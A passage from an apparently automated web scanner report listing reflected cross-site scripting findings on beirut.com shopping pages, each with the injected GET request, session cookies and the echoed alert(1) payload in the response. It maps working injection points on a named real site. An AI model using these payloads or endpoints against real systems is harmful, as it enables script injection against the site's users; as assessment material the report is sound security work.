Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:16:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Books Music Moviese180d<script>alert(1)</script>e757b572d02 <a href="#" id="backlink">
...[SNIP]...

4.752. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Music/72 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Music/72

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be4ac'-alert(1)-'8b522bd1a75 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Books-Music-Moviesbe4ac'-alert(1)-'8b522bd1a75/05084418/Music/72 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:16:07 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Books-Music-Moviesbe4ac'-alert(1)-'8b522bd1a75/05084418/Music/72';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.753. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Music/72 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Music/72

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9726'-alert(1)-'55efcd52eb5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Books-Music-Movies/05084418e9726'-alert(1)-'55efcd52eb5/Music/72 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:23:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Books-Music-Movies/05084418e9726'-alert(1)-'55efcd52eb5/Music/72';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.754. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Music/72 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Music/72

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84b92'-alert(1)-'ad4a10db0ef was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Books-Music-Movies/05084418/Music84b92'-alert(1)-'ad4a10db0ef/72 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:35:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Books-Music-Movies/05084418/Music84b92'-alert(1)-'ad4a10db0ef/72';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.755. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Music/72 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Music/72

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a784b'-alert(1)-'63148e25070 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Books-Music-Movies/05084418/Music/72a784b'-alert(1)-'63148e25070 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:40:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Books-Music-Movies/05084418/Music/72a784b'-alert(1)-'63148e25070';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.756. http://www.beirut.com/Shopping/Clothing-Accessories/194367784 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e398c'-alert(1)-'594e82ce06 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shoppinge398c'-alert(1)-'594e82ce06/Clothing-Accessories/194367784 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:06:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shoppinge398c'-alert(1)-'594e82ce06/Clothing-Accessories';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.757. http://www.beirut.com/Shopping/Clothing-Accessories/194367784 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1819f"><a>b044d9257ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping1819f"><a>b044d9257ad/Clothing-Accessories/194367784 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:58:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping1819f"><a>b044d9257ad">
...[SNIP]...

4.758. http://www.beirut.com/Shopping/Clothing-Accessories/194367784 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c583c'-alert(1)-'9a5270b3338 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessoriesc583c'-alert(1)-'9a5270b3338/194367784 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:10:59 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessoriesc583c'-alert(1)-'9a5270b3338';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.759. http://www.beirut.com/Shopping/Clothing-Accessories/194367784 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7639c<script>alert(1)</script>eedd98e9c32 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessories7639c<script>alert(1)</script>eedd98e9c32/194367784 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:11:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessories7639c<script>alert(1)</script>eedd98e9c32 <a href="#" id="backlink">
...[SNIP]...

4.760. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acf2d'-alert(1)-'a77b80a9f16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shoppingacf2d'-alert(1)-'a77b80a9f16/Clothing-Accessories/194367784/Accessories-for-Her/48 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:31:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shoppingacf2d'-alert(1)-'a77b80a9f16/Clothing-Accessories/194367784/Accessories-for-Her/48';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.761. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93695"><a>752e3b68b21 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping93695"><a>752e3b68b21/Clothing-Accessories/194367784/Accessories-for-Her/48 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:14:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping93695"><a>752e3b68b21">
...[SNIP]...

4.762. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4efb1<script>alert(1)</script>270c69688f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessories4efb1<script>alert(1)</script>270c69688f2/194367784/Accessories-for-Her/48 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:45:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessories4efb1<script>alert(1)</script>270c69688f2 <a href="#" id="backlink">
...[SNIP]...

4.763. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5817'-alert(1)-'f1d9a9f0a05 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessoriesa5817'-alert(1)-'f1d9a9f0a05/194367784/Accessories-for-Her/48 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:44:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61949

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Clothing-Accessoriesa5817'-alert(1)-'f1d9a9f0a05/194367784/Accessories-for-Her/48';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.764. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a731'-alert(1)-'b933d2c31c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/1943677849a731'-alert(1)-'b933d2c31c6/Accessories-for-Her/48 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:52:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
